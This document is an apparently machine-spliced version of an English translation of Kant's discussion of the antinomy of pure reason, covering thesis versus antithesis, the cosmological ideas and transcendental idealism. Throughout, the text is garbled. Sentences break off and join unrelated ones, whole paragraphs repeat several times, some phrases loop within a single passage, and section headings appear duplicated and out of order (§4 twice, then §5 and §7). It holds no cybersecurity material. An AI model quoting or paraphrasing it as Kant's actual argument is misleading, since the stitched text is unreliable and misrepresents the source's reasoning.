Secondly, reason has a speculative interest on the side of the thesis. When the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned with its conditions (and the whole series of the latter) does not in the major premise carry with it any limitation through time or any concept of succession. The empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis and of the series thereby represented. In the major premise all the members of the series are given in themselves, without any condition of time, but in this minor premise they are possible only through the successive regress, which is given only in the process in which it is actually carried out.

When this error has thus been shown to be involved in the argument upon which both parties alike base their cosmological assertions, both might justly be dismissed, as being unable to offer any sufficient title in support of their claims.

But the quarrel is not thereby ended — as if one or both of the parties had been proved to be wrong in the actual doctrines they assert, that is, in the conclusions of their arguments. For although they have failed to support their contentions by valid grounds of proof, nothing seems to be clearer than that since one of them asserts that the world has a beginning, it will then, in the necessary empirical regress, be too small for the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, but only to think and to invent in the assurance that it cannot be refuted by the facts of nature, not being bound by the evidence which they yield, but presuming to pass them by or even to subordinate them to a higher authority, namely, that of pure reason.

The empiricist will never allow, therefore, that any epoch of nature is to be taken as the absolutely first; on the contrary, it finds comfort in such concepts, and at the same time a fixed point to which the thread by which it guides its movements can be attached. In the restless ascent from the conditioned to the condition, always with one foot in the air, there can be no satisfaction.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas, we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest on the side of the thesis. When the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general rest always again upon other conditions, without ever obtaining unconditioned footing and support in any self-subsistent thing, viewed as primordial being.

Thirdly, the thesis has also the advantage of popularity; and this certainly forms no small part of its claim to favour.

The common understanding. It insists upon having something from which it can make a confident start. The difficulty of even conceiving this presupposed starting-point does not disquiet it. Since it is unaware what conceiving really means, it never occurs to it to reflect upon the assumption; it accepts as known whatever is familiar to it through frequent use. For the common understanding, indeed, all speculative interests pale before the practical; and it imagines that it comprehends and knows what its fears or hopes incite it to assume or to believe.

Thus empiricism is entirely devoid of the popularity of transcendentally idealising reason; and however prejudicial such empiricism may be to the highest practical principles, there is no need to fear that it will ever pass the limits of the Schools, and acquire any considerable influence in the general life or any real favour among the multitude.

Human reason is by nature architectonic. That is to say, it regards all our knowledge as belonging to a possible system, and therefore allows only such principles as do not at any rate make it impossible for any knowledge that we may attain to combine into a system with other knowledge. But the propositions of the antithesis are of such a kind that they render the completion of the edifice of knowledge quite impossible. They maintain that there is always to be found beyond every state of the world a more ancient state, in every part yet other parts similarly divisible, prior to every event still another event which itself again is likewise generated, and that in existence in general everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge quite impossible. They maintain that there is always to be found beyond every state of the world a more ancient state, in every part yet other parts similarly divisible, prior to every event still another event which itself again is likewise generated, and that in existence in general everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interests. Since, however, it is fitting that a reflective and enquiring being should devote a certain amount of time to the examination of his own reason, entirely divesting himself of all partiality and openly submitting his observations to the judgment of others, no one can be blamed for, much less prohibited from, presenting for trial the two opposing parties, leaving them, terrorised by no threats, to defend themselves as best they can, before a jury of like standing with themselves, that is, before a jury of fallible men.
§ 4
THE ABSOLUTE NECESSITY OF A SOLUTION OF THE TRANSCENDENTAL PROBLEMS OF PURE REASON

To profess to solve all problems and to answer all questions would be impudent boasting, and would argue such extravagant self-conceit as at once to forfeit all confidence. Nevertheless there are sciences the very nature of which requires that every question arising within their domain should be completely answerable in terms of what is known, inasmuch as the answer must issue from the same sources from which the question proceeds. In these sciences it is not permissible to plead unavoidable ignorance; the solution can be demanded.

We must be able, in every possible case, in accordance with a rule, to know what is right and what is wrong, since this concerns our obligation, and we have no obligation to that which we cannot know. In the explanation of natural appearances, on the other hand, much must remain uncertain and many questions insoluble, because what we know of nature is by no means sufficient, in all cases, to account for what has to be explained. The question, therefore, is whether in transcendental philosophy, they have been divested of all empirical features, although only in connection therewith can their full splendour be displayed. But in this empirical application, and in the progressive extension of the employment of reason, philosophy, beginning with the field of our experiences and steadily soaring to these lofty ideas, displays a dignity and worth such that, could it but make good its pretensions, it would leave all other human science far behind. For it promises a secure foundation for our highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

Whether the world has a beginning, it will then, in the necessary empirical regress, be too small for the concept of the understanding, I should be in a position to understand that since the cosmological idea has no bearing save upon an object of experience which has to be in conformity with a possible concept of the understanding, I should be in a position to understand that since the cosmological idea has no bearing save upon an object of experience which has to be in conformity with a possible concept of the understanding. We have thus been maintaining that the fault lies with the idea, in being too large or too small for any concept of the understanding, I should be in a position to understand that since the cosmological idea has no bearing save upon an object of experience which has to be in conformity with a possible concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has a beginning, it will then, in the necessary empirical regress, be too small for the concept of the understanding. For since the beginning still presupposes a time which precedes it, it is still not unconditioned; and the law of the empirical employment of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but empirical modes of knowledge — I cannot say, in the same sense of the terms, that if the conditioned is given, a regress in the series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, to regard appearances both as things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between the concepts. The synthesis of the conditioned with its conditions (and the whole series of the latter) does not in the major premise carry with it any limitation through time or any concept of succession. The empirical synthesis, on the side of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned; therefore, etc. Through this syllogism, the major premise of which appears so natural and evident, as many cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned is given, a regress in the series of all its conditions is likewise given; objects of the senses are given as conditioned; therefore, etc. Through this syllogism, the major premise of which appears so natural and evident, as many cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides, save by their becoming convinced that the very fact of their being able so admirably to refute one another is evidence that they are really quarrelling about nothing, and that a certain transcendental illusion has mocked them with a reality where none is to be found. This is the path which we shall now proceed to follow in the settlement of a dispute that defies all attempts to come to a decision.
* * *

Zeno of Elea, a subtle dialectician, was severely reprimanded by Plato as a mischievous Sophist who, to show his skill, would set out to prove a proposition through convincing arguments and then immediately overthrow them by other arguments equally strong. Zeno maintained, for example, that God (probably conceived by him as simply the world) is neither finite nor infinite. For an appearance is not something existing in itself, and its parts are first given in and through the regress of the decomposing synthesis, a regress which is never given in absolute completeness, either as finite or as infinite. This also holds of the series of subordinated causes, and of the series that proceeds from the conditioned to unconditioned necessary existence. These series can never be regarded as being in themselves in their totality either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself, it is either finite or infinite. Being series of subordinated representations, they exist only in the dynamical regress, and prior to this regress can have no existence in themselves as self-subsistent series of things.

Thus the antinomy of pure reason in its cosmological ideas vanishes when it is shown that it is merely dialectical, and that it is a conflict due to an illusion which arises from our applying to appearances that exist only in our representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself. The empirical truth of appearances in space and time is an appearance; it is not anything in itself but consists merely of representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are connected in this manner in space and time, and are determinable according to laws of the unity of experience. Thus we can say that the real things of past time are given in the transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself all existing objects of the senses in all time and in all places, I do not set them in space and time [as being there] prior to experience. This representation is nothing but the thought of a possible experience in its absolute completeness, either as finite or as infinite. This also holds of the series of subordinated causes, and of the series that proceeds from the conditioned to unconditioned necessary existence. These series can never be regarded as being in themselves in their totality either finite or infinite. Being series of subordinated representations, they exist only in the dynamical regress, and prior to this regress can have no existence in themselves as self-subsistent series of things.

Thus the antinomy of pure reason in its cosmological ideas vanishes when it is shown that it is merely dialectical, and that it is a conflict due to an illusion which arises from our applying to appearances that exist only in our representations, and therefore, so far as they form a series, not otherwise than in a successive regress, that idea of absolute totality which holds only as a condition of things in themselves. From this antinomy we can, however, obtain, not indeed a dogmatic, but a critical and doctrinal advantage. It affords indirect proof of the transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself. This assertion may, however, likewise be false; the world may not be given as a thing in itself, nor as being in its magnitude either infinite or finite. I beg permission to entitle this kind of opposition dialectical, and that of contradictories analytical. Thus of two dialectically opposed judgments both may be false; for the one is not a mere contradictory of the other, but says something more than is required for a simple contradiction.

If we regard the two propositions, that the world is infinite in magnitude and that it is finite in magnitude, as contradictory opposition of the two assertions is converted into a merely dialectical opposition. Since the world does not exist in itself, independently of the laws of nature (freedom), and so of encroaching upon the business of the understanding, which is that of investigating, according to necessary rules, the origin of appearances. And, lastly, he will not grant that a cause ought ever to be sought outside nature, in an original being. We know nothing but nature, since it alone can present objects to us and instruct us in regard to their laws.

If the empirical philosopher had no other purpose in propounding his antithesis than to subdue the rashness and presumption of those who so far misconstrue the true vocation of reason as to boast of insight and knowledge just where true insight and knowledge cease, and to represent as furthering speculative interests that which is valid only in relation to practical interests (in order, as may suit their convenience, to break the thread of physical enquiries, and then under the pretence of extending knowledge to fasten it to transcendental ideas, through which we really know only that we know nothing); if, I say, the empiricist were satisfied with this, his principle would be a maxim urging moderation in our pretensions, modesty in our assertions, and yet at the same time the greatest possible extension of our understanding, through the teacher fittingly assigned to us, namely, through experience. If such were our procedure, we should not be cut off from employing intellectual presuppositions and faith on behalf of our practical interest; only they could never be permitted to assume the title and dignity of science and rational insight. Knowledge, which as such is speculative, can have no other object than that supplied by experience; if we transcend the limits thus imposed, the synthesis which seeks, independently of experience, new species of knowledge, lacks that substratum of intuition upon which alone it can be exercised.

But when empiricism itself, as frequently happens, becomes dogmatic in its attitude towards ideas, and confidently denies whatever lies beyond the sphere of its intuitive knowledge, it betrays the same lack of modesty; and this is all the more reprehensible owing to the irreparable injury which is thereby caused to the practical interests of reason.

The contrast between the teaching of Epicurus and that of Plato is of this nature.

Each of the two types of philosophy says more than it knows. The former encourages and furthers knowledge, though to the prejudice of the practical; the latter supplies excellent practical principles, but it permits reason to indulge in ideal explanations of natural appearances, on the other hand, much must remain uncertain and many questions insoluble, because what we know of nature is by no means sufficient, in all cases, to account for what has to be explained. The question, therefore, is whether in transcendental philosophy there is any question relating to an object presented to pure reason which is unanswerable by this reason, and whether we may rightly excuse ourselves from giving a decisive answer. In thus excusing ourselves, we should have to show that any knowledge which we can acquire still leaves us in complete uncertainty as to what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances, it must either be too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is always too small for the idea, and in the latter too large, and that the blame therefore attaches to the empirical regress, and therefore for any possible concept of the understanding therefore obliges us to look for a higher temporal condition; and the world [as limited in time] is therefore obviously too small for this law.

This is also true of the twofold answer to the question regarding the magnitude of the world in space. If it is infinite and unlimited, it is too large for any possible empirical concept. If it is finite and limited, we have a right to ask what determines these limits. Empty space is no self-subsistent correlate of things, and cannot be a condition at which we could stop; still less can it be an empirical condition, forming part of a possible experience. Accordingly, all events which have taken place in the immense periods that have preceded my own existence mean really nothing but the possibility of extending the chain of experience from the present perception back to the conditions which determine this perception in respect of time.

If, therefore, I represent to myself all existing objects of the senses in all time and in all places, I do not set them in space and time [as being there] prior to experience. This representation is nothing but the thought of a possible experience, not as a thing in itself, the answer to the transcendental dogmatism which compels it to rise to concepts far outstripping the insight and rational faculties of the most practised thinkers. But this is precisely what commends such dogmatism to the common understanding. For it then finds itself in a position in which the most learned can claim no advantage over it. If it understands little or nothing about these matters, no one can boast of understanding much more; and though in regard to them it cannot express itself in so scholastically correct a manner as those with special training, nevertheless there is no end to the plausible arguments which it can propound, wandering as it does amidst mere ideas, about which no one knows anything, and in regard to which it is therefore free to be as eloquent as it pleases; whereas when matters that involve the investigation of nature are in question, it has to stand silent and to admit its ignorance. Thus indolence and vanity combine in sturdy support of these principles. Besides, although the philosopher finds it extremely hard to accept a principle for which he can give no justification, still more to employ concepts the objective reality of which he is unable to establish, nothing is more usual in the case of the common understanding, it might be supposed, would eagerly adopt a programme which promises to satisfy it through exclusively empirical knowledge and the rational connections there revealed — in preference to the transcendental dogmatism which compels it to rise to concepts far outstripping the insight and rational faculties of the most practised thinkers. But this is precisely what commends such dogmatism to the common understanding. It insists upon having something from which it can make a confident start. The difficulty of even conceiving this presupposed starting-point does not disquiet it. Since it is unaware what conceiving really means, it never occurs to it to reflect upon the assumption; it accepts as known whatever is familiar to it through frequent use. For the common understanding. It insists upon having something from which it can make a confident start. The difficulty of even conceiving this presupposed starting-point does not disquiet it. Since it is unaware what conceiving really means, it never occurs to it to reflect upon the assumption; it accepts as known whatever is familiar to it through frequent use. For the common understanding, indeed, all speculative interests pale before the practical; and it imagines that it comprehends and knows what its fears or hopes incite it to assume or to believe.

Thus empiricism is entirely devoid of the popularity of transcendentally idealising reason; and however prejudicial such empiricism may be to the highest practical principles, there is no need to fear that it will ever pass the limits of the Schools, and acquire any considerable influence in the general life or any real favour among the multitude.

Human reason is by nature architectonic. That is to say, it regards all our knowledge as belonging to a possible system, and therefore allows only such principles as do not at any rate make it impossible for any knowledge that we may attain to combine into a system with other knowledge. But the propositions of the antithesis are of such a kind that they render the completion of the edifice of knowledge quite impossible. They maintain that there is always to be found beyond every state of the world a more ancient state, in every part yet other parts similarly divisible, prior to every event still another event which itself again is likewise generated, and that in existence in general everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interests. Since, however, it is fitting that a reflective and enquiring being should devote a certain amount of time to the examination of his own reason, entirely divesting himself of all partiality and openly submitting his observations to the judgment of others, no one can be blamed for, much less prohibited from, presenting for trial the two opposing parties, leaving them, terrorised by no threats, to defend themselves as best they can, before a jury of like standing with themselves, that is, before a jury of fallible men.
§ 4
THE ABSOLUTE NECESSITY OF A SOLUTION OF THE TRANSCENDENTAL PROBLEMS OF PURE REASON

To profess to solve all problems and to answer all questions would be impudent boasting, and would argue such extravagant self-conceit as at once to forfeit all confidence. Nevertheless there are sciences the very nature of which requires that every question arising within their domain should be completely answerable in terms of what is known, inasmuch as the answer must issue from the same sources from which the question proceeds. In these sciences it is not permissible to plead unavoidable ignorance; the solution can be demanded.

We must be able, in every possible case, in accordance with a rule, to know what is right and what is wrong, since this concerns our obligation, and we have no obligation to that which we cannot know. In the explanation of natural appearances, in regard to which a speculative knowledge is alone possible to us — to the neglect of physical investigation.

Finally, as regards the third factor which has to be considered in a preliminary choice between the two conflicting parties, it is extremely surprising that empiricism should be so universally unpopular. The common understanding, it might be supposed, would eagerly adopt a programme which promises to satisfy it through exclusively empirical knowledge and the rational connections there revealed — in preference to the transcendental dogmatism which compels it to rise to concepts far outstripping the insight and rational faculties of the most practised thinkers. But this is precisely what commends such dogmatism to the common understanding. For it then finds itself in a position in which the most learned can claim no advantage over it. If it understands little or nothing about these matters, no one can boast of understanding much more; and though in regard to them it cannot express itself in so scholastically correct a manner as those with special training, nevertheless there is no end to the plausible arguments which it can propound, wandering as it does amidst mere ideas, about which no one knows anything, and in regard to which it is therefore free to be as eloquent as it pleases; whereas when matters that involve the investigation of nature are in question, it has to stand silent and to admit its ignorance. Thus indolence and vanity combine in sturdy support of these principles. Besides, although the philosopher finds it extremely hard to accept a principle for which he can give no justification, still more to employ concepts the objective reality of which he is unable to establish, nothing is more usual in the case of the common understanding. It insists upon having something from which it can make a confident start. The difficulty of even conceiving this presupposed starting-point does not disquiet it. Since it is unaware what conceiving really means, it never occurs to it to reflect upon the assumption; it accepts as known whatever is familiar to it through frequent use. For the common understanding, indeed, all speculative interests pale before the practical; and it imagines that it comprehends and knows what its fears or hopes incite it to assume or to believe.

Thus empiricism is entirely devoid of the popularity of transcendentally idealising reason; and however prejudicial such empiricism may be to the highest practical principles, but it permits reason to indulge in ideal explanations of natural appearances, in regard to which it is therefore free to be as eloquent as it pleases; whereas when matters that involve the investigation of nature are in question, it has to stand silent and to admit its ignorance. Thus indolence and vanity combine in sturdy support of these principles. Besides, although the philosopher finds it extremely hard to accept a principle for which he can give no justification, still more to employ concepts the objective reality of which he is unable to establish, nothing is more usual in the case of the common understanding. It insists upon having something from which it can make a confident start. The difficulty of even conceiving this presupposed starting-point does not disquiet it. Since it is unaware what conceiving really means, it never occurs to it to reflect upon the assumption; it accepts as known whatever is familiar to it through frequent use. For the common understanding, indeed, all speculative interests pale before the practical; and it imagines that it comprehends and knows what its fears or hopes incite it to assume or to believe.

Thus empiricism is entirely devoid of the popularity of transcendentally idealising reason; and however prejudicial such empiricism may be to the highest practical principles, there is no need to fear that it will ever pass the limits of the Schools, and acquire any considerable influence in the general life or any real favour among the multitude.

Human reason is by nature architectonic. That is to say, it regards all our knowledge as belonging to a possible system, and therefore allows only such principles as do not at any rate make it impossible for any knowledge that we may attain to combine into a system with other knowledge. But the propositions of the antithesis are of such a kind that they render the completion of the edifice of knowledge quite impossible. They maintain that there is always to be found beyond every state of the world a more ancient state, in every part yet other parts similarly divisible, prior to every event still another event which itself again is likewise generated, and that in existence in general everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interests. Since, however, it is fitting that a reflective and enquiring being should devote a certain amount of time to the examination of his own reason, entirely divesting himself of all partiality and openly submitting his observations to the judgment of others, no one can be blamed for, much less prohibited from, presenting for trial the two opposing parties, leaving them, terrorised by no threats, to defend themselves as best they can, before a jury of like standing with themselves, that is, outside this advance of experience.

Nothing is really given us save perception and the empirical advance from this to other possible perceptions. For the appearances, as mere representations, are in themselves real only in perception, which perception is in fact nothing but the reality of an empirical representation, that is, appearance. To call an appearance a real thing prior to our perceiving it, either means that in the advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves but only of our sensibility. Accordingly, that which is in space and time is an appearance; it is not anything in itself but consists merely of representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with a question which oversteps the limits of possible experience, does distinction of the mode in which we view the reality of those objects of the senses become of importance, as serving to guard us against a deceptive error which is bound to arise if we misinterpret our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL DIALECTIC

We have sufficiently proved in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself. From this it then follows that appearances in general are nothing outside our representations — which is just what is meant by their transcendental ideality.

